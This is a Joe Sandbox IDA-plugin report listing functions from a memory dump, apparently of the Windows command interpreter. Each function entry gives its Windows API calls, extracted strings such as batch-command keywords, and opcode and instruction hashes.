                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                              • String ID:
                              • API String ID: 3829876242-3916222277
                              • Opcode ID: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                              • Instruction ID: 3a69a2d93234f8b92d4f0312febd89b40c1327ce03382570613b30d2752f16a4
                              • Opcode Fuzzy Hash: 10a5b567e72863909b04e51aaf43edd524101fd282eaa5692d28ef0ea38d911e
                              • Instruction Fuzzy Hash: 7E614C22B0C642C7E714BF12A49467ABAA0FF89B54F899134DE4E077D8DF3DE9059720
                              Function 00007FF744F31A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                              • String ID: CSVFS$NTFS$REFS
                              • API String ID: 3510147486-2605508654
                              • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction ID: 9f4b5936edc2866ff2910dc7e2726382f52930e4d73e31ab811d6cd979096073
                              • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                              • Instruction Fuzzy Hash: DF614B32608BC2CAEB65AF22D8843E9B7A4FB45B85F884135CE0D4B798DF78D108D710
                              Function 00007FF744F072B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                              Download Yara Rule
                              APIs
                              • longjmp.MSVCRT(?,00000000,00000000,00007FF744F07279,?,?,?,?,?,00007FF744F0BFA9), ref: 00007FF744F24485
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: longjmp
                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                              • API String ID: 1832741078-366822981
                              • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction ID: 109a54b415bf797ec0dfebacb15f12dd6c5695099882bd940f00190373921ac1
                              • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                              • Instruction Fuzzy Hash: 8AC17C20E0CA42C2F724FE5791C66B9A791BB86B84FDC1036DD0D976D9CF7EA445A320
                              Function 00007FF744F0B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • memset.MSVCRT ref: 00007FF744F0BA2B
                              • wcschr.MSVCRT ref: 00007FF744F0BA8A
                              • wcschr.MSVCRT ref: 00007FF744F0BAAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heapwcschr$AllocProcessmemset
                              • String ID: -$:.\$=,;$=,;+/[] "
                              • API String ID: 2872855111-969133440
                              • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction ID: 59741425758ddda153433a6607d33792f22b7ed85af1229b3d19ae8a17905996
                              • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                              • Instruction Fuzzy Hash: E2B15021A1D682C2EB60BF5694C8279A6A0FB84B84FD94135CE5E477D8DF3CE845A320
                              Function 00007FF744F303AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$ErrorLast$InformationVolume
                              • String ID: %04X-%04X$~
                              • API String ID: 2748242238-2468825380
                              • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                              • Instruction ID: 00a6ed8e6dce2bb466a51660b5c239b758cbb3680376b514624ebc3595bfcbcb
                              • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                              • Instruction Fuzzy Hash: E6A1922270CBC1CAEB65AF2298902E9B7A1FB85784F848135DE4D5BB8CDF3CD6059710
                              Function 00007FF744F1662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                              Download Yara Rule
                              APIs
                              • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F16677
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F1668F
                              • _errno.MSVCRT ref: 00007FF744F166A3
                              • wcstol.MSVCRT ref: 00007FF744F166C4
                              • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166E4
                              • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF744F16570,?,?,?,?,?,?,00000000,00007FF744F16488), ref: 00007FF744F166FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$_errnoiswalphawcschrwcstol
                              • String ID: +-~!$APerformUnaryOperation: '%c'
                              • API String ID: 2348642995-441775793
                              • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction ID: 15892242fbd41ab1058907dab7ef25dced591be2279c1aca43cd1de7ec2e8cb4
                              • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                              • Instruction Fuzzy Hash: C6712C6290CA46C6F7607F16D490279B7B0EB49B94B98D135DE4E062D8EF3CAC84E720
                              Function 00007FF744F09400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                              • String ID: FAT$~
                              • API String ID: 2238823677-1832570214
                              • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                              • Instruction ID: d49027fb8ccd0a36c75820779e4bb28ef48ccb691ff204248f381aa1655992ff
                              • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                              • Instruction Fuzzy Hash: 4A717F3260CBC1CAEB21EF2298946E9B7A4FB85784F884035DE4D4BB98DF3CD6459710
                              Function 00007FF744F0D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D884
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D89D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D94D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0D964
                              • _wcsnicmp.MSVCRT ref: 00007FF744F0DB89
                              • wcstol.MSVCRT ref: 00007FF744F0DBDF
                              • wcstol.MSVCRT ref: 00007FF744F0DC63
                              • memmove.MSVCRT ref: 00007FF744F0DD33
                              • memmove.MSVCRT ref: 00007FF744F0DE9A
                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF744F0FE2A), ref: 00007FF744F0DF1F
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                              • String ID:
                              • API String ID: 1051989028-0
                              • Opcode ID: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                              • Instruction ID: 901f8f6214ab0272db2a7f5d164919d863a5e24c976376b47277a28b19911b9c
                              • Opcode Fuzzy Hash: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                              • Instruction Fuzzy Hash: 3A026166A0D741C1EB24BF16A48827AF6A1FBC5B94F988231DE8D037D8DF3CE451A710
                              Function 00007FF744F086B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$_wcsicmp$AllocProcess
                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                              • API String ID: 3223794493-3086019870
                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction ID: 12d4b15e22430fa8dd1971d9ce4685fcf6ae55beeeabca1876c5fac0c510c836
                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                              • Instruction Fuzzy Hash: 84516C21A0CA42C6EB14BF16A484179ABA0FB59B90FDC9135CE5E073E8DF3CE445A720
                              Function 00007FF744F12B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                              • API String ID: 0-3124875276
                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                              • Instruction ID: 088bf0f6956e9922bec56c5743b53b2ed57f7dd04b52f661d996d977c8fbefa9
                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                              • Instruction Fuzzy Hash: CE516B20A0C653C2FB14BFA2E4852B9F6A0AF45B45FC94035CE0E562EDDF3CA905A720
                              Function 00007FF744F0FC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                              • String ID: 0123456789
                              • API String ID: 1606811317-2793719750
                              • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                              • Instruction ID: aa0bc3b0296e8b54f275a3306339d5a8baa0acf11d299d94b5f44628bb04ecf0
                              • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                              • Instruction Fuzzy Hash: 61D16B21A0DA52C2EB10BF16A884579B7A0BB85794FCC8232DE5D137EDDE3CE405A720
                              Function 00007FF744F16FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00007FF744F17013
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F17123
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1706E
                              • wcsncmp.MSVCRT ref: 00007FF744F170A5
                              • wcsstr.MSVCRT ref: 00007FF744F1F9DB
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA00
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA5F
                                • Part of subcall function 00007FF744F1823C: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F18280
                                • Part of subcall function 00007FF744F1823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F1829D
                                • Part of subcall function 00007FF744F13A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F2EAC5,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F13A56
                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F1FA3D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                              • String ID: \\.\
                              • API String ID: 799470305-2900601889
                              • Opcode ID: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                              • Instruction ID: d13f207a974d858b038bac1215526a98e11af15591800062390be7eff92292cb
                              • Opcode Fuzzy Hash: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                              • Instruction Fuzzy Hash: 39518432A0CA82C6EB60BF2298902B9A7B0FB85B54F8D4535DE4D477D8DF3CD9459320
                              Function 00007FF744F08B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                              • String ID:
                              • API String ID: 1944892715-0
                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                              • Instruction ID: 57354500c5e18ad981b340c689262095e7d20531c8ecc6ffe554f18588de612d
                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                              • Instruction Fuzzy Hash: 28B13F61A0DA42C6EB64BF13A4D4179E6A1BF95B80FCC9535CE4E473D9DE3CE844A320
                              Function 00007FF744F05458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              • _get_osfhandle.MSVCRT ref: 00007FF744F054DE
                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F0552B
                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F0554F
                              • _get_osfhandle.MSVCRT ref: 00007FF744F2345F
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F2347E
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F234C3
                              • _get_osfhandle.MSVCRT ref: 00007FF744F234DB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF744F01F7D), ref: 00007FF744F234FA
                                • Part of subcall function 00007FF744F136EC: _get_osfhandle.MSVCRT ref: 00007FF744F13715
                                • Part of subcall function 00007FF744F136EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF744F13770
                                • Part of subcall function 00007FF744F136EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13791
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                              • String ID:
                              • API String ID: 1356649289-0
                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                              • Instruction ID: 595f2f2b99f8b3dcb5d587b66cb1e76065437cf52d6aa23c5cc059e1cd21e07a
                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                              • Instruction Fuzzy Hash: 14917E72A0C642CBE714BF22A48457AFAA1FB89B84F9C5135DE4E476D8DF3DE4409B10
                              Function 00007FF744F2BFEC Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 444COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                                • Part of subcall function 00007FF744F1081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F1084E
                              • towupper.MSVCRT ref: 00007FF744F2C1C9
                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F2C31C
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF744F2C5CB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                              • String ID: %s $%s>$PROMPT$Unknown$\$x
                              • API String ID: 2242554020-3610052186
